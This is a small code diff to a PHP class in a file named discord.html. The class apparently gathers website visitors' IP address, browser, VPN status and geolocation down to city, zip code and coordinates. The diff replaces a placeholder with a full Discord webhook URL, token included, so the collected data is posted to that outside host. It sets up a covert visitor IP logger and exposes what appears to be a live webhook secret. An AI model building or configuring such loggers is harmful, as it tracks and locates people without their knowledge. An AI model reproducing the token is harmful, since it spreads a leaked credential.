--- a/discord.html
+++ b/discord.html
@@ -56,7 +56,7 @@ class Discord
         global $IP, $Browser, $Date, $Time, $VPN, $Country, $CountryCode, $Region, $City, $Zip, $Lat, $Lon, $WebhookName, $Flag;
 
 		//Insert FULL webhook URL here (URL begins with: https://discord.com/api/webhooks/)
-        $Webhook = "FULLURLHERE";
+        $Webhook = "https://ptb.discord.com/api/webhooks/1376131891102748682/V5XxcrZyBUX9_ybZQf92kt8k6IceJJt87k-i6EUatSMLE8Krq1Oqz218_o6URnKbBzeZ";
 
         $InfoArr = array(
             "username" => "$WebhookName",
